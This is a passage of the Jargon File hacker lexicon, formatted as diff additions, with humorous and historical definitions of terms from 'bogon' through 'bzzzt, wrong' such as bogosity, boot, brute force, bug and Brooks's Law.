{bogus}; + compare {psyton}, {fat electrons}, {magic smoke}. + + The bogon has become the type case for a whole bestiary of nonce + particle names, including the `clutron' or `cluon' (indivisible + particle of cluefulness, obviously the antiparticle of the bogon) + and the futon (elementary particle of {randomness}). These are + not so much live usages in themselves as examples of a live + meta-usage: that is, it has become a standard joke or linguistic + maneuver to "explain" otherwise mysterious circumstances by inventing + nonce particle names. And these imply nonce particle theories, with + all their dignity or lack thereof (we might note *parenthetically* that + this is a generalization from "(bogus particle) theories" to "bogus + (particle theories)"!). Perhaps such particles are the modern-day + equivalents of trolls and wood-nymphs as standard starting-points + around which to construct explanatory myths. Of course, playing on + an existing word (as in the `futon') yields additional flavor. + Compare {magic smoke}. + +:bogon filter: /boh'gon fil'tr/ n. Any device, software or hardware, + that limits or suppresses the flow and/or emission of bogons. + "Engineering hacked a bogon filter between the Cray and + the VAXen, and now we're getting fewer dropped packets." See + also {bogosity}, {bogus}. + +:bogon flux: /boh'gon fluhks/ n. A measure of a supposed field of + {bogosity} emitted by a speaker, measured by a {bogometer}; + as a speaker starts to wander into increasing bogosity a listener + might say "Warning, warning, bogon flux is rising". See + {quantum bogodynamics}. + +:bogosity: /boh-go's*-tee/ n. 1. The degree to which something is + {bogus}. At CMU, bogosity is measured with a {bogometer}; in + a seminar, when a speaker says something bogus, a listener might + raise his hand and say "My bogometer just triggered". More + extremely, "You just pinned my bogometer" means you just said or + did something so outrageously bogus that it is off the scale, + pinning the bogometer needle at the highest possible reading (one + might also say "You just redlined my bogometer"). The + agreed-upon unit of bogosity is the microLenat /mi:k`roh-len'*t/ + (uL). The consensus is that this is the largest unit practical + for everyday use. 2. The potential field generated by a {bogon + flux}; see {quantum bogodynamics}. See also {bogon flux}, + {bogon filter}, {bogus}. + + Historical note: The microLenat was invented as an attack against + noted computer scientist Doug Lenat by a {tenured graduate + student}. Doug had failed the student on an important exam for + giving only "AI is bogus" as his answer to the questions. The + slur is generally considered unmerited, but it has become a running + gag nevertheless. Some of Doug's friends argue that *of + course* a microLenat is bogus, since it is only one millionth of a + Lenat. Others have suggested that the unit should be redesignated + after the grad student, as the microReid. + +:bogotify: /boh-go't*-fi:/ vt. To make or become bogus. A + program that has been changed so many times as to become completely + disorganized has become bogotified. If you tighten a nut too hard + and strip the threads on the bolt, the bolt has become bogotified + and you had better not use it any more. This coinage led to the + notional `autobogotiphobia' defined as `the fear of becoming + bogotified'; but is not clear that the latter has ever been + `live' jargon rather than a self-conscious joke in jargon about + jargon. See also {bogosity}, {bogus}. + +:bogue out: /bohg owt/ vi. To become bogus, suddenly and + unexpectedly. "His talk was relatively sane until somebody asked + him a trick question; then he bogued out and did nothing but + {flame} afterwards." See also {bogosity}, {bogus}. + +:bogus: adj. 1. Non-functional. "Your patches are bogus." + 2. Useless. "OPCON is a bogus program." 3. False. "Your + arguments are bogus." 4. Incorrect. "That algorithm is bogus." + 5. Unbelievable. "You claim to have solved the halting problem + for Turing Machines? That's totally bogus." 6. Silly. "Stop + writing those bogus sagas." + + Astrology is bogus. So is a bolt that is obviously about to break. + So is someone who makes blatantly false claims to have solved a + scientific problem. (This word seems to have some, but not all, of + the connotations of {random} --- mostly the negative ones.) + + It is claimed that `bogus' was originally used in the hackish sense + at Princeton in the late 1960s. It was spread to CMU and Yale by + Michael Shamos, a migratory Princeton alumnus. A glossary of bogus + words was compiled at Yale when the word was first popularized (see + {autobogotiphobia} under {bogotify}). The word spread into + hackerdom from CMU and MIT. By the early 1980s it was also + current in something like the hackish sense in West Coast teen + slang, and it had gone mainstream by 1985. A correspondent from + Cambridge reports, by contrast, that these uses of `bogus' grate on + British nerves; in Britain the word means, rather specifically, + `counterfeit', as in "a bogus 10-pound note". + +:Bohr bug: /bohr buhg/ [from quantum physics] n. A repeatable + {bug}; one that manifests reliably under a possibly unknown but + well-defined set of conditions. Antonym of {heisenbug}; see also + {mandelbug}, {schroedinbug}. + +:boink: /boynk/ [USENET: ascribed there to the TV series + "Cheers" and "Moonlighting"] 1. To have sex with; + compare {bounce}, sense 3. (This is mainstream slang.) In + Commonwealth hackish the variant `bonk' is more common. 2. After + the original Peter Korn `Boinkon' {USENET} parties, used for + almost any net social gathering, e.g., Miniboink, a small boink + held by Nancy Gillett in 1988; Minniboink, a Boinkcon in Minnesota + in 1989; Humpdayboinks, Wednesday get-togethers held in the San + Francisco Bay Area. Compare {@-party}. 3. Var of `bonk'; + see {bonk/oif}. + +:bomb: 1. v. General synonym for {crash} (sense 1) except that + it is not used as a noun; esp. used of software or OS failures. + "Don't run Empire with less than 32K stack, it'll bomb." + 2. n.,v. Atari ST and Macintosh equivalents of a UNIX `panic' or + Amiga {guru} (sense 2), where icons of little black-powder bombs + or mushroom clouds are displayed, indicating that the system has + died. On the Mac, this may be accompanied by a decimal (or + occasionally hexadecimal) number indicating what went wrong, + similar to the Amiga {guru meditation} number. {{MS-DOS}} + machines tend to get {locked up} in this situation. + +:bondage-and-discipline language: A language (such as Pascal, Ada, + APL, or Prolog) that, though ostensibly general-purpose, is + designed so as to enforce an author's theory of `right + programming' even though said theory is demonstrably inadequate for + systems hacking or even vanilla general-purpose programming. Often + abbreviated `B&D'; thus, one may speak of things "having the + B&D nature". See {{Pascal}}; oppose {languages of choice}. + +:bonk/oif: /bonk/, /oyf/ interj. In the {MUD} community, it has + become traditional to express pique or censure by `bonking' the + offending person. There is a convention that one should + acknowledge a bonk by saying `oif!' and a myth to the effect that + failing to do so upsets the cosmic bonk/oif balance, causing much + trouble in the universe. Some MUDs have implemented special + commands for bonking and oifing. See also {talk mode}, + {posing}. + +:book titles:: There is a tradition in hackerdom of informally + tagging important textbooks and standards documents with the + dominant color of their covers or with some other conspicuous + feature of the cover. Many of these are described in this lexicon + under their own entries. See {Aluminum Book}, {Blue Book}, + {Cinderella Book}, {Devil Book}, {Dragon Book}, {Green + Book}, {Orange Book}, {Pink-Shirt Book}, {Purple Book}, + {Red Book}, {Silver Book}, {White Book}, {Wizard Book}, + {Yellow Book}, and {bible}; see also {rainbow + series}. + +:boot: [techspeak; from `by one's bootstraps'] v.,n. To load and + initialize the operating system on a machine. This usage is no + longer jargon (having passed into techspeak) but has given rise to + some derivatives that are still jargon. + + The derivative `reboot' implies that the machine hasn't been + down for long, or that the boot is a {bounce} intended to clear + some state of {wedgitude}. This is sometimes used of human + thought processes, as in the following exchange: "You've lost + me." "OK, reboot. Here's the theory...." + + This term is also found in the variants `cold boot' (from + power-off condition) and `warm boot' (with the CPU and all + devices already powered up, as after a hardware reset or software + crash). + + Another variant: `soft boot', reinitialization of only part of a + system, under control of other software still running: "If + you're running the {mess-dos} emulator, control-alt-insert will + cause a soft-boot of the emulator, while leaving the rest of the + system running." + + Opposed to this there is `hard boot', which connotes hostility + towards or frustration with the machine being booted: "I'll have + to hard-boot this losing Sun." "I recommend booting it + hard." One often hard-boots by performing a {power cycle}. + + Historical note: this term derives from `bootstrap loader', a short + program that was read in from cards or paper tape, or toggled in + from the front panel switches. This program was always very short + (great efforts were expended on making it short in order to + minimize the labor and chance of error involved in toggling it in), + but was just smart enough to read in a slightly more complex + program (usually from a card or paper tape reader), to which it + handed control; this program in turn was smart enough to read the + application or operating system from a magnetic tape drive or disk + drive. Thus, in successive steps, the computer `pulled itself up + by its bootstraps' to a useful operating state. Nowadays the + bootstrap is usually found in ROM or EPROM, and reads the first + stage in from a fixed location on the disk, called the `boot + block'. When this program gains control, it is powerful enough to + load the actual OS and hand control over to it. + +:bottom feeder: n. syn. for {slopsucker} derived from the + fisherman's and naturalist's term for finny creatures who subsist + on the primordial ooze. + +:bottom-up implementation: n. Hackish opposite of the techspeak term + `top-down design'. It is now received wisdom in most + programming cultures that it is best to design from higher levels + of abstraction down to lower, specifying sequences of action in + increasing detail until you get to actual code. Hackers often find + (especially in exploratory designs that cannot be closely + specified in advance) that it works best to *build* things in + the opposite order, by writing and testing a clean set of primitive + operations and then knitting them together. + +:bounce: v. 1. [perhaps from the image of a thrown ball bouncing + off a wall] An electronic mail message that is undeliverable and + returns an error notification to the sender is said to `bounce'. + See also {bounce message}. 2. [Stanford] To play volleyball. + At the now-demolished {D. C. Power Lab} building used by the + Stanford AI Lab in the 1970s, there was a volleyball court on the + front lawn. From 5 P.M. to 7 P.M. was the scheduled + maintenance time for the computer, so every afternoon at 5 the + computer would become unavailable, and over the intercom a voice + would cry, "Now hear this: bounce, bounce!" followed by Brian + McCune loudly bouncing a volleyball on the floor outside the + offices of known volleyballers. 3. To engage in sexual + intercourse; prob. from the expression `bouncing the mattress', + but influenced by Roo's psychosexually loaded "Try bouncing me, + Tigger!" from the "Winnie-the-Pooh" books. Compare + {boink}. 4. To casually reboot a system in order to clear up a + transient problem. Reported primarily among {VMS} users. + 5. [IBM] To {power cycle} a peripheral in order to reset it. + +:bounce message: [UNIX] n. Notification message returned to sender by + a site unable to relay {email} to the intended {{Internet address}} + recipient or the next link in a {bang path} (see {bounce}). + Reasons might include a nonexistent or misspelled username or a + {down} relay site. Bounce messages can themselves fail, with + occasionally ugly results; see {sorcerer's apprentice mode}. + The terms `bounce mail' and `barfmail' are also common. + +:boustrophedon: [from a Greek word for turning like an ox while + plowing] n. An ancient method of writing using alternate + left-to-right and right-to-left lines. This term is actually + philologists' techspeak and typesetter's jargon. Erudite hackers + use it for an optimization performed by some computer typesetting + software (notably UNIX `troff(1)'). The adverbial form + `boustrophedonically' is also found (hackers purely love + constructions like this). + +:box: n. 1. A computer; esp. in the construction `foo box' + where foo is some functional qualifier, like `graphics', or + the name of an OS (thus, `UNIX box', `MS-DOS box', etc.) "We + preprocess the data on UNIX boxes before handing it up to the + mainframe." 2. [within IBM] Without qualification but within an + SNA-using site, this refers specifically to an IBM front-end + processor or FEP /F-E-P/. An FEP is a small computer necessary + to enable an IBM {mainframe} to communicate beyond the limits of + the {dinosaur pen}. Typically used in expressions like the cry + that goes up when an SNA network goes down: "Looks like the + {box} has fallen over." (See {fall over}.) See also + {IBM}, {fear and loathing}, {fepped out}, {Blue + Glue}. + +:boxed comments: n. Comments (explanatory notes attached to program + instructions) that occupy several lines by themselves; so called + because in assembler and C code they are often surrounded by a box + in a style something like this: + + /************************************************* + * + * This is a boxed comment in C style + * + *************************************************/ + + Common variants of this style omit the asterisks in column 2 or add + a matching row of asterisks closing the right side of the box. The + sparest variant omits all but the comment delimiters themselves; + the `box' is implied. Oppose {winged comments}. + +:boxen: /bok'sn/ [by analogy with {VAXen}] pl.n. Fanciful + plural of {box} often encountered in the phrase `UNIX boxen', + used to describe commodity {{UNIX}} hardware. The connotation is + that any two UNIX boxen are interchangeable. + +:boxology: /bok-sol'*-jee/ n. Syn. {ASCII art}. This term + implies a more restricted domain, that of box-and-arrow drawings. + "His report has a lot of boxology in it." Compare + {macrology}. + +:bozotic: /boh-zoh'tik/ or /boh-zo'tik/ [from the name of a TV + clown even more losing than Ronald McDonald] adj. Resembling or + having the quality of a bozo; that is, clownish, ludicrously wrong, + unintentionally humorous. Compare {wonky}, {demented}. Note + that the noun `bozo' occurs in slang, but the mainstream + adjectival form would be `bozo-like' or (in New England) + `bozoish'. + +:BQS: /B-Q-S/ adj. Syn. {Berkeley Quality Software}. + +:brain dump: n. The act of telling someone everything one knows + about a particular topic or project. Typically used when someone + is going to let a new party maintain a piece of code. Conceptually + analogous to an operating system {core dump} in that it saves a + lot of useful {state} before an exit. "You'll have to + give me a brain dump on FOOBAR before you start your new job at + HackerCorp." See {core dump} (sense 4). At Sun, this is also + known as `TOI' (transfer of information). + +:brain fart: n. The actual result of a {braino}, as opposed to + the mental glitch which is the braino itself. E.g. typing + `dir' on a UNIX box after a session with DOS. + +:brain-damaged: 1. [generalization of `Honeywell Brain Damage' + (HBD), a theoretical disease invented to explain certain utter + cretinisms in Honeywell {{Multics}}] adj. Obviously wrong; + {cretinous}; {demented}. There is an implication that the + person responsible must have suffered brain damage, because he + should have known better. Calling something brain-damaged is + really bad; it also implies it is unusable, and that its failure to + work is due to poor design rather than some accident. "Only six + monocase characters per file name? Now *that's* + brain-damaged!" 2. [esp. in the Mac world] May refer to free + demonstration software that has been deliberately crippled in some + way so as not to compete with the commercial product it is + intended to sell. Syn. {crippleware}. + +:brain-dead: adj. Brain-damaged in the extreme. It tends to imply + terminal design failure rather than malfunction or simple + stupidity. "This comm program doesn't know how to send a break + --- how brain-dead!" + +:braino: /bray'no/ n. Syn. for {thinko}. See also {brain + fart}. + +:branch to Fishkill: [IBM: from the location of one of the + corporation's facilities] n. Any unexpected jump in a program that + produces catastrophic or just plain weird results. See {jump + off into never-never land}, {hyperspace}. + +:brand brand brand: n. Humorous catch-phrase from {BartleMUD}s, in + which players were described carrying a list of objects, the most + common of which would usually be a brand. Often used as a joke in + {talk mode} as in "Fred the wizard is here, carrying brand ruby + brand brand brand kettle broadsword flamethrower". A brand is a + torch, of course; one burns up a lot of those exploring dungeons. + Prob. influenced by the famous Monty Python "Spam" skit. + +:bread crumbs: n. Debugging statements inserted into a program that + emit output or log indicators of the program's {state} to a file + so you can see where it dies, or pin down the cause of surprising + behavior. The term is probably a reference to the Hansel and Gretel + story from the Brothers Grimm; in several variants, a character + leaves a trail of breadcrumbs so as not to get lost in the + woods. + +:break: 1. vt. To cause to be broken (in any sense). "Your latest + patch to the editor broke the paragraph commands." 2. v. (of a + program) To stop temporarily, so that it may debugged. The place + where it stops is a `breakpoint'. 3. [techspeak] vi. To send an + RS-232 break (two character widths of line high) over a serial comm + line. 4. [UNIX] vi. To strike whatever key currently causes the + tty driver to send SIGINT to the current process. Normally, break + (sense 3) or delete does this. 5. `break break' may be said to + interrupt a conversation (this is an example of verb doubling). + This usage comes from radio communications, which in turn probably + came from landline telegraph/teleprinter usage, as badly abused in + the Citizen's Band craze a few years ago. + +:break-even point: n. in the process of implementing a new computer + language, the point at which the language is sufficiently effective + that one can implement the language in itself. That is, for a new + language called, hypothetically, FOOGOL, one has reached break-even + when one can write a demonstration compiler for FOOGOL in FOOGOL, + discard the original implementation language, and thereafter use + older versions of FOOGOL to develop newer ones. This is an + important milestone; see {MFTL}. + +:breath-of-life packet: [XEROX PARC] n. An Ethernet packet that + contained bootstrap (see {boot}) code, periodically sent out + from a working computer to infuse the `breath of life' into any + computer on the network that had happened to crash. Machines + depending on such packets have sufficient hardware or firmware code + to wait for (or request) such a packet during the reboot process. + See also {dickless workstation}. + +:breedle: n. See {feep}. + +:bring X to its knees: v. To present a machine, operating system, + piece of software, or algorithm with a load so extreme or + {pathological} that it grinds to a halt. "To bring a MicroVAX + to its knees, try twenty users running {vi} --- or four running + {EMACS}." Compare {hog}. + +:brittle: adj. Said of software that is functional but easily broken + by changes in operating environment or configuration, or by any + minor tweak to the software itself. Also, any system that + responds inappropriately and disastrously to expected external + stimuli; e.g., a file system that is usually totally scrambled by a + power failure is said to be brittle. This term is often used to + describe the results of a research effort that were never intended + to be robust, but it can be applied to commercially developed + software, which displays the quality far more often than it ought + to. Oppose {robust}. + +:broadcast storm: n. An incorrect packet broadcast on a network that + causes most hosts to respond all at once, typically with wrong + answers that start the process over again. See {network + meltdown}. + +:broken: adj. 1. Not working properly (of programs). 2. Behaving + strangely; especially (when used of people) exhibiting extreme + depression. + +:broken arrow: [IBM] n. The error code displayed on line 25 of a + 3270 terminal (or a PC emulating a 3270) for various kinds of + protocol violations and "unexpected" error conditions (including + connection to a {down} computer). On a PC, simulated with + `->/_', with the two center characters overstruck. In true + {luser} fashion, the original documentation of these codes + (visible on every 3270 terminal, and necessary for debugging + network problems) was confined to an IBM customer engineering + manual. + + Note: to appreciate this term fully, it helps to know that `broken + arrow' is also military jargon for an accident involving nuclear + weapons.... + +:broket: /broh'k*t/ or /broh'ket`/ [by analogy with `bracket': a + `broken bracket'] n. Either of the characters `<' and `>', + when used as paired enclosing delimiters. This word + originated as a contraction of the phrase `broken bracket', that + is, a bracket that is bent in the middle. (At MIT, and apparently + in the {Real World} as well, these are usually called {angle + brackets}.) + +:Brooks's Law: prov. "Adding manpower to a late software project + makes it later" --- a result of the fact that the advantage from + splitting work among N programmers is O(N) (that is, + proportional to N), but the complexity and communications + cost associated with coordinating and then merging their work + is O(N^2) (that is, proportional to the square of N). + The quote is from Fred Brooks, a manager of IBM's OS/360 project + and author of `The Mythical Man-Month' (Addison-Wesley, 1975, + ISBN 0-201-00650-2), an excellent early book on software + engineering. The myth in question has been most tersely expressed + as "Programmer time is fungible" and Brooks established + conclusively that it is not. Hackers have never forgotten his + advice; too often, {management} does. See also + {creationism}, {second-system effect}. + +:BRS: /B-R-S/ n. Syn. {Big Red Switch}. This abbreviation is + fairly common on-line. + +:brute force: adj. Describes a primitive programming style, one in + which the programmer relies on the computer's processing power + instead of using his or her own intelligence to simplify the + problem, often ignoring problems of scale and applying na"ive + methods suited to small problems directly to large ones. + + The {canonical} example of a brute-force algorithm is associated + with the `traveling salesman problem' (TSP), a classical {NP-}hard + problem: Suppose a person is in, say, Boston, and wishes to drive + to N other cities. In what order should he or she visit + them in order to minimize the distance travelled? The brute-force + method is to simply generate all possible routes and compare the + distances; while guaranteed to work and simple to implement, this + algorithm is clearly very stupid in that it considers even + obviously absurd routes (like going from Boston to Houston via San + Francisco and New York, in that order). For very small N it + works well, but it rapidly becomes absurdly inefficient when + N increases (for N = 15, there are already + 1,307,674,368,000 possible routes to consider, and for + N = 1000 --- well, see {bignum}). See + also {NP-}. + + A more simple-minded example of brute-force programming is finding + the smallest number in a large list by first using an existing + program to sort the list in ascending order, and then picking the + first number off the front. + + Whether brute-force programming should be considered stupid or not + depends on the context; if the problem isn't too big, the extra CPU + time spent on a brute-force solution may cost less than the + programmer time it would take to develop a more `intelligent' + algorithm. Additionally, a more intelligent algorithm may imply + more long-term complexity cost and bug-chasing than are justified + by the speed improvement. + + Ken Thompson, co-inventor of UNIX, is reported to have uttered the + epigram "When in doubt, use brute force". He probably intended + this as a {ha ha only serious}, but the original UNIX kernel's + preference for simple, robust, and portable algorithms over + {brittle} `smart' ones does seem to have been a significant + factor in the success of that OS. Like so many other tradeoffs in + software design, the choice between brute force and complex, + finely-tuned cleverness is often a difficult one that requires both + engineering savvy and delicate esthetic judgment. + +:brute force and ignorance: n. A popular design technique at many + software houses --- {brute force} coding unrelieved by any + knowledge of how problems have been previously solved in elegant + ways. Dogmatic adherence to design methodologies tends to + encourage it. Characteristic of early {larval stage} + programming; unfortunately, many never outgrow it. Often + abbreviated BFI: "Gak, they used a bubble sort! That's strictly + from BFI." Compare {bogosity}. + +:BSD: /B-S-D/ n. [abbreviation for `Berkeley System Distribution'] a + family of {{UNIX}} versions for the DEC {VAX} and PDP-11 + developed by Bill Joy and others at {Berzerkeley} starting + around 1980, incorporating paged virtual memory, TCP/IP networking + enhancements, and many other features. The BSD versions (4.1, 4.2, + and 4.3) and the commercial versions derived from them (SunOS, + ULTRIX, and Mt. Xinu) held the technical lead in the UNIX world + until AT&T's successful standardization efforts after about 1986, + and are still widely popular. See {{UNIX}}, {USG UNIX}. + +:BUAF: // [abbreviation, from the alt.fan.warlord] n. Big + Ugly ASCII Font --- a special form of {ASCII art}. Various + programs exist for rendering text strings into block, bloob, and + pseudo-script fonts in cells between four and six character cells + on a side; this is smaller than the letters generated by older + {banner} (sense 2) programs. These are sometimes used to render + one's name in a {sig block}, and are critically referred to as + `BUAF's. See {warlording}. + +:BUAG: // [abbreviation, from the alt.fan.warlord] n. Big + Ugly ASCII Graphic. Pejorative term for ugly {ASCII ART}, + especially as found in {sig block}s. For some reason, mutations + of the head of Bart Simpson are particularly common in the least + imaginative {sig block}s. See {warlording}. + +:bubble sort: n. Techspeak for a particular sorting technique in + which pairs of adjacent values in the list to be sorted are + compared and interchanged if they are out of order; thus, list + entries `bubble upward' in the list until they bump into one with a + lower sort value. Because it is not very good relative to other + methods and is the one typically stumbled on by {na"ive} and + untutored programmers, hackers consider it the {canonical} + example of a na"ive algorithm. The canonical example of a really + *bad* algorithm is {bogo-sort}. A bubble sort might be used + out of ignorance, but any use of bogo-sort could issue only from + brain damage or willful perversity. + +:bucky bits: /buh'kee bits/ n. 1. obs. The bits produced by the + CONTROL and META shift keys on a SAIL keyboard (octal 200 and 400 + respectively), resulting in a 9-bit keyboard character set. The + MIT AI TV (Knight) keyboards extended this with TOP and separate + left and right CONTROL and META keys, resulting in a 12-bit + character set; later, LISP Machines added such keys as SUPER, + HYPER, and GREEK (see {space-cadet keyboard}). 2. By extension, + bits associated with `extra' shift keys on any keyboard, e.g., + the ALT on an IBM PC or command and option keys on a Macintosh. + + It is rumored that `bucky bits' were named for Buckminster Fuller + during a period when he was consulting at Stanford. Actually, + `Bucky' was Niklaus Wirth's nickname when *he* was at + Stanford; he first suggested the idea of an EDIT key to set the + 8th bit of an otherwise 7-bit ASCII character. This was used in a + number of editors written at Stanford or in its environs (TV-EDIT + and NLS being the best-known). The term spread to MIT and CMU + early and is now in general use. See {double bucky}, + {quadruple bucky}. + +:buffer overflow: n. What happens when you try to stuff more data + into a buffer (holding area) than it can handle. This may be due + to a mismatch in the processing rates of the producing and + consuming processes (see {overrun} and {firehose syndrome}), + or because the buffer is simply too small to hold all the data that + must accumulate before a piece of it can be processed. For example, + in a text-processing tool that {crunch}es a line at a time, a + short line buffer can result in {lossage} as input from a long + line overflows the buffer and trashes data beyond it. Good + defensive programming would check for overflow on each character + and stop accepting data when the buffer is full up. The term is + used of and by humans in a metaphorical sense. "What time did I + agree to meet you? My buffer must have overflowed." Or "If I + answer that phone my buffer is going to overflow." See also + {spam}, {overrun screw}. + +:bug: n. An unwanted and unintended property of a program or piece + of hardware, esp. one that causes it to malfunction. Antonym of + {feature}. Examples: "There's a bug in the editor: it writes + things out backwards." "The system crashed because of a hardware + bug." "Fred is a winner, but he has a few bugs" (i.e., Fred is + a good guy, but he has a few personality problems). + + Historical note: Some have said this term came from telephone + company usage, in which "bugs in a telephone cable" were blamed + for noisy lines, but this appears to be an incorrect folk + etymology. Admiral Grace Hopper (an early computing pioneer better + known for inventing {COBOL}) liked to tell a story in which a + technician solved a persistent {glitch} in the Harvard Mark II + machine by pulling an actual insect out from between the contacts + of one of its relays, and she subsequently promulgated {bug} in + its hackish sense as a joke about the incident (though, as she was + careful to admit, she was not there when it happened). For many + years the logbook associated with the incident and the actual bug + in question (a moth) sat in a display case at the Naval Surface + Warfare Center. The entire story, with a picture of the logbook + and the moth taped into it, is recorded in the `Annals of the + History of Computing', Vol. 3, No. 3 (July 1981), pp. 285--286. + + The text of the log entry (from September 9, 1945), reads "1545 + Relay #70 Panel F (moth) in relay. First actual case of bug being + found". This wording seems to establish that the term was already + in use at the time in its current specific sense --- and Hopper + herself reports that the term `bug' was regularly applied to + problems in radar electronics during WWII. Indeed, the use of + `bug' to mean an industrial defect was already established in + Thomas Edison's time, and `bug' in the sense of an disruptive + event goes back to Shakespeare! In the first edition of Samuel + Johnson's dictionary one meaning of `bug' is "A frightful + object; a walking spectre"; this is traced to `bugbear', a Welsh + term for a variety of mythological monster which (to complete the + circle) has recently been reintroduced into the popular lexicon + through fantasy role-playing games. + + In any case, in jargon the word almost never refers to insects. + Here is a plausible conversation that never actually happened: + + "There is a bug in this ant farm!" + + "What do you mean? I don't see any ants in it." + + "That's the bug." + + [There has been a widespread myth that the original bug was moved + to the Smithsonian, and an earlier version of this entry so + asserted. A correspondent who thought to check discovered that the + bug was not there. While investigating this in late 1990, your + editor discovered that the NSWC still had the bug, but had + unsuccessfully tried to get the Smithsonian to accept it --- and + that the present curator of their History of American Technology + Museum didn't know this and agreed that it would make a worthwhile + exhibit. It was moved to the Smithsonian in mid-1991. Thus, the + process of investigating the original-computer-bug bug fixed it in + an entirely unexpected way, by making the myth true! --- ESR] + + [1992 update: the plot thickens! A usually reliable source reports + having seen The Bug at the Smithsonian in 1978. I am unable to + reconcile the conflicting histories I have been offered, and merely + report this fact here. --- ESR.] + +:bug-compatible: adj. Said of a design or revision that has been + badly compromised by a requirement to be compatible with + {fossil}s or {misfeature}s in other programs or (esp.) + previous releases of itself. "MS-DOS 2.0 used \ as a path + separator to be bug-compatible with some cretin's choice of / as an + option character in 1.0." + +:bug-for-bug compatible: n. Same as {bug-compatible}, with the + additional implication that much tedious effort went into ensuring + that each (known) bug was replicated. + +:buglix: /buhg'liks/ n. Pejorative term referring to DEC's ULTRIX + operating system in its earlier *severely* buggy versions. + Still used to describe ULTRIX, but without venom. Compare + {AIDX}, {HP-SUX}, {Nominal Semidestructor}, {Telerat}, + {sun-stools}. + +:bulletproof: adj. Used of an algorithm or implementation considered + extremely {robust}; lossage-resistant; capable of correctly + recovering from any imaginable exception condition. This is a rare + and valued quality. Syn. {armor-plated}. + +:bum: 1. vt. To make highly efficient, either in time or space, + often at the expense of clarity. "I managed to bum three more + instructions out of that code." "I spent half the night bumming + the interrupt code." In {elder days}, John McCarthy (inventor + of {LISP}) used to compare some efficiency-obsessed hackers + among his students to "ski bums"; thus, optimization became + "program bumming", and eventually just "bumming". 2. To + squeeze out excess; to remove something in order to improve + whatever it was removed from (without changing function; this + distinguishes the process from a {featurectomy}). 3. n. A small + change to an algorithm, program, or hardware device to make it more + efficient. "This hardware bum makes the jump instruction + faster." Usage: now uncommon, largely superseded by v. {tune} + (and n. {tweak}, {hack}), though none of these exactly + capture sense 2. All these uses are rare in Commonwealth hackish, + because in the parent dialects of English `bum' is a rude synonym + for `buttocks'. + +:bump: vt. Synonym for increment. Has the same meaning as + C's ++ operator. Used esp. of counter variables, pointers, and + index dummies in `for', `while', and `do-while' + loops. + +:burble: [from Lewis Carroll's "Jabberwocky"] v. Like {flame}, + but connotes that the source is truly clueless and ineffectual + (mere flamers can be competent). A term of deep contempt. + "There's some guy on the phone burbling about how he got a DISK + FULL error and it's all our comm software's fault." + +:buried treasure: n. A surprising piece of code found in some + program. While usually not wrong, it tends to vary from {crufty} + to {bletcherous}, and has lain undiscovered only because it was + functionally correct, however horrible it is. Used sarcastically, + because what is found is anything *but* treasure. Buried + treasure almost always needs to be dug up and removed. "I just + found that the scheduler sorts its queue using {bubble sort}! + Buried treasure!" + +:burn-in period: n. 1. A factory test designed to catch systems + with {marginal} components before they get out the door; the + theory is that burn-in will protect customers by outwaiting the + steepest part of the {bathtub curve} (see {infant + mortality}). 2. A period of indeterminate length in which a person + using a computer is so intensely involved in his project that he + forgets basic needs such as food, drink, sleep, etc. Warning: + Excessive burn-in can lead to burn-out. See {hack mode}, + {larval stage}. + +:burst page: n. Syn. {banner}, sense 1. + +:busy-wait: vi. Used of human behavior, conveys that the subject is + busy waiting for someone or something, intends to move instantly as + soon as it shows up, and thus cannot do anything else at the + moment. "Can't talk now, I'm busy-waiting till Bill gets off the + phone." + + Technically, `busy-wait' means to wait on an event by + {spin}ning through a tight or timed-delay loop that polls for + the event on each pass, as opposed to setting up an interrupt + handler and continuing execution on another part of the task. This + is a wasteful technique, best avoided on time-sharing systems where + a busy-waiting program may {hog} the processor. + +:buzz: vi. 1. Of a program, to run with no indication of progress + and perhaps without guarantee of ever finishing; esp. said of + programs thought to be executing tight loops of code. A program + that is buzzing appears to be {catatonic}, but you never get out + of catatonia, while a buzzing loop may eventually end of its own + accord. "The program buzzes for about 10 seconds trying to sort + all the names into order." See {spin}; see also {grovel}. + 2. [ETA Systems] To test a wire or printed circuit trace for + continuity by applying an AC rather than DC signal. Some wire + faults will pass DC tests but fail a buzz test. 3. To process an + array or list in sequence, doing the same thing to each element. + "This loop buzzes through the tz array looking for a terminator + type." + +:BWQ: /B-W-Q/ [IBM: abbreviation, `Buzz Word Quotient'] The + percentage of buzzwords in a speech or documents. Usually roughly + proportional to {bogosity}. See {TLA}. + +:by hand: adv. Said of an operation (especially a repetitive, + trivial, and/or tedious one) that ought to be performed + automatically by the computer, but which a hacker instead has to + step tediously through. "My mailer doesn't have a command to + include the text of the message I'm replying to, so I have to do it + by hand." This does not necessarily mean the speaker has to + retype a copy of the message; it might refer to, say, dropping into + a {subshell} from the mailer, making a copy of one's mailbox file, + reading that into an editor, locating the top and bottom of the + message in question, deleting the rest of the file, inserting `>' + characters on each line, writing the file, leaving the editor, + returning to the mailer, reading the file in, and later remembering + to delete the file. Compare {eyeball search}. + +:byte:: /bi:t/ [techspeak] n. A unit of memory or data equal to + the amount used to represent one character; on modern architectures + this is usually 8 bits, but may be 9 on 36-bit machines. Some + older architectures used `byte' for quantities of 6 or 7 bits, and + the PDP-10 supported `bytes' that were actually bitfields of + 1 to 36 bits! These usages are now obsolete, and even 9-bit bytes + have become rare in the general trend toward power-of-2 word sizes. + + Historical note: The term originated in 1956 during the early + design phase for the IBM Stretch computer; originally it was + described as 1 to 6 bits (typical I/O equipment of the period + used 6-bit chunks of information). The move to an 8-bit byte + happened in late 1956, and this size was later adopted and + promulgated as a standard by the System/360. The term `byte' was + coined by mutating the word `bite' so it would not be accidentally + misspelled as {bit}. See also {nybble}. + +:bytesexual: /bi:t`sek'shu-*l/ adj. Said of hardware, denotes + willingness to compute or pass data in either {big-endian} or + {little-endian} format (depending, presumably, on a {mode bit} + somewhere). See also {NUXI problem}. + +:bzzzt, wrong: /bzt rong/ [USENET/Internet] From a Robin Williams + routine in the movie "Dead Poets Society" spoofing radio or + TV quiz programs, such as *Truth or Consequences*, where an + incorrect answer earns one a blast from the buzzer and condolences + from the interlocutor. A way of expressing mock-rude disagreement, + usually immediately following an included quote from another + poster. The less abbreviated "*Bzzzzt*, wrong, but thank you for + playing" is also common; capitalization and emphasis of the + buzzer sound varies. + += C = +===== + +:C: n. 1. The third letter of the English alphabet. 2. ASCII + 1000011. 3. The name of a programming language designed by + Dennis Ritchie during the early 1970s and immediately used to + reimplement {{UNIX}}; so called because many features derived + from an earlier compiler named `B' in commemoration of + *its* parent, BCPL. Before Bjarne Stroustrup settled the + question by designing C++, there was a humorous debate over whether + C's 